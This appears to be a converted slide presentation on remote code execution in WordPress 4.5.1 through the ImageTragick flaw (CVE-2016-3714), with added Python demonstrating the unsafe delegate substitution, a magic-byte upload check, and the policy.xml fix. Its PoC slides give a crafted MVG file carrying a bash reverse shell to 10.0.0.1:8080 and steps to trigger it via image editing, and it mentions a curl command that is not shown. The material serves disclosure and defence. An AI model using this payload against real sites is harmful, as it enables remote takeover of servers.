1. Remote Code Execution in WordPress 4.5.1
AUTHOR: SINA YEGANEH
EMAIL: SINAAA.YEAGNEH@GMAIL.COM
2. ImageMagick
Imagick is a native PHP extension for creating and modifying images
through the ImageMagick API.
ImageMagick is a software suite to create, edit, and compose
bitmap images. It can read, convert and write images in a variety of
formats (over 100), including DPX, EXR, GIF, JPEG, JPEG-2000, PDF,
PhotoCD, PNG, PostScript, SVG, and TIFF.
3. ImageMagick Vulnerability Information
A few days ago an ImageMagick vulnerability was disclosed as
CVE-2016-3714 (publicised as "ImageTragick").
ImageMagick's ReadImage() function in MagickCore/constitute.c resolves
an image from its filename. When the filename begins with https://
(or another scheme served by an external program), ReadImage() calls
InvokeDelegate(), which builds a shell command from the delegate
template and the filename. The filename is not sanitized before it is
substituted into that command.
4. Exploit ImageMagick
One of the default delegate commands (from delegates.xml) handles
HTTPS requests with:
"wget" -q -O "%o" "https:%M"
where %o is the output file and %M is the actual link taken from the
input. The value is pasted inside the double quotes without escaping,
so it is possible to pass a value like:
example.com"|ls "-la
The embedded quote closes wget's argument and the pipe makes the shell
run a second command (here ls -la) with ImageMagick's privileges.
5. How is WordPress affected?
WordPress chooses a library for editing images. When the Imagick PHP
extension is installed, WordPress image processing uses it by default,
ahead of GD.
6. How is WordPress affected?
If WordPress selects the Imagick library, it loads every image it edits
through that library, so the file is parsed by ImageMagick.
7. How is WordPress affected?
wp_crop_image() resolves the attachment's path with get_attached_file()
and hands the file to the image editor. With Imagick in use, ImageMagick
parses the file; a crafted file reaches the delegate command, which
ImageMagick runs through the system shell, as described in slide 4.
8. PoC
Log in to an account with Author permissions, upload a normal image,
publish a post, and insert the image into it as media.
9. PoC
Create exploit.png with the following content (an MVG drawing script,
not a real PNG):
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")'
pop graphic-context
Upload exploit.png and add it to the post.
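The following Python is an added example, not code from the original slides: it models the unsafe %M substitution from slide 4 with the slide's own delegate template and payload, showing where the shell sees a second command, and then applies the upload-side check a site owner would want, namely that the file's magic bytes agree with its extension, which rejects the exploit.png from slide 9 before ImageMagick parses it. The sample bytes, filenames and the small magic-byte table are constructed for the demonstration.

```python
"""Added example (not part of the original slides): model the unsafe %M
substitution behind CVE-2016-3714 with the slide's delegate template and
payloads, and the magic-byte check that rejects the exploit.png from the PoC.
Every sample value below is constructed for the demonstration."""
import shlex

# The https delegate command from ImageMagick's delegates.xml as quoted on
# the slide: %o is the output file, %M the link taken from the image filename.
HTTPS_DELEGATE = '"wget" -q -O "%o" "https:%M"'

# Operators that make the shell run another command once outside quotes.
SHELL_OPERATORS = {"|", ";", "&", "&&", "||"}


def expand_delegate(template: str, output: str, link: str) -> str:
    """Unsafe substitution as the vulnerable code did it: paste %o and %M
    into the template verbatim, with no escaping of quotes or operators."""
    return template.replace("%o", output).replace("%M", link)


def shell_words(command: str) -> list:
    """Split a command the way a POSIX shell would, with '|' and friends
    returned as separate operator tokens instead of glued into words."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def spawns_extra_command(command: str) -> bool:
    """True if the expanded delegate string runs anything besides wget."""
    return any(word in SHELL_OPERATORS for word in shell_words(command))


# --- Upload-side check: does the content match the claimed image type? ---
# Leading bytes of the formats a typical blog accepts (constructed table).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def sniff_image_type(data: bytes):
    """Return the format indicated by the leading bytes, or None."""
    for kind, prefixes in MAGIC.items():
        if data.startswith(prefixes):
            return kind
    return None


def upload_is_safe(filename: str, data: bytes) -> bool:
    """Accept an upload only when its magic bytes agree with its extension.
    An MVG script renamed to .png fails here before ImageMagick sees it."""
    ext = filename.rsplit(".", 1)[-1].lower()
    ext = {"jpg": "jpeg"}.get(ext, ext)
    return sniff_image_type(data) == ext


# Constructed samples: the start of a real PNG, and the slide's exploit file
# written with ls -la as the injected command.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"
EXPLOIT_PNG = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"fill 'url(https://example.com/image.jpg\"|ls \"-la)'\n"
    b"pop graphic-context\n"
)

if __name__ == "__main__":
    benign = expand_delegate(HTTPS_DELEGATE, "out.png", "//example.com/image.jpg")
    evil = expand_delegate(HTTPS_DELEGATE, "out.png", 'example.com"|ls "-la')
    for cmd in (benign, evil):
        print(cmd, "->", shell_words(cmd), "extra command:", spawns_extra_command(cmd))
    print("cat.png accepted:", upload_is_safe("cat.png", PNG_SAMPLE))
    print("exploit.png accepted:", upload_is_safe("exploit.png", EXPLOIT_PNG))
```

The tokeniser output makes the bug visible: the benign link stays a single quoted argument to wget, while the slide's payload produces the tokens `|`, `ls`, `-la` after it. The magic-byte check is the complement to the policy.xml fix: it stops text scripts posing as images at the upload boundary, whereas the policy stops ImageMagick from acting on them if one gets through.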
10. PoC
Click the normal picture, select Edit, then Edit Original.
12. PoC
Then click the broken image (exploit.png), select Edit and Edit
Original, and check the requests listed in the browser's Network tab.
Find the admin-ajax.php request sent with the POST method and copy its
_ajax_nonce and postid parameters.
13. PoC
Paste the new parameters taken from the broken image into the curl
command mentioned before. The connect-back to the listener (10.0.0.1:8080
in the payload above) is the proof of code execution.
Change the bash command as you wish; note that the >& and /dev/tcp
redirections are bash syntax, so if the target's /bin/sh is dash the
command must be wrapped as bash -c '...' or replaced with another
connect-back.
14. How do I know if my site is vulnerable?
Inspect the output of the phpinfo() function for "imagick"; that section
also reports the ImageMagick version the extension is linked against.
Run php -m | grep imagick on the command line.
15. How do I patch the vulnerability?
Currently the best known fix is to add a policy.xml file to your ImageMagick
installation that disables the coders (and therefore the delegates) that
ImageMagick would otherwise use. Due to the ongoing nature of this issue, we
recommend you refer to and follow https://imagetragick.com/ for instructions
on how to handle the problem.
Documentation on the policy.xml file can be found at
https://www.imagemagick.org/script/resources.php.
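As an added illustration of that fix, not text from the original slides, the following is the coder policy published on imagetragick.com for this issue, in the form that would be merged into the installation's existing policymap. The file path in the comment is the usual ImageMagick 6 location and is an assumption about the target system; the last four entries were added to the advisory after the initial disclosure for the related TEXT, SHOW, WIN and PLT coders.

```xml
<!-- /etc/ImageMagick/policy.xml (ImageMagick 6; the path varies by build).
     Merge these entries into the existing <policymap> of the installation. -->
<policymap>
  <!-- Deny the coders reachable from a filename or from an MVG/MSL script,
       so fill 'url(https://...)' can no longer reach the https delegate. -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <!-- Added to the advisory later for the related coder issues. -->
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
```

After editing the file, run convert -list policy to confirm the entries are active for the ImageMagick build that Imagick is linked against, and re-run the exploit.png test from the PoC: with the MVG and HTTPS coders denied, ImageMagick refuses the file instead of spawning the delegate.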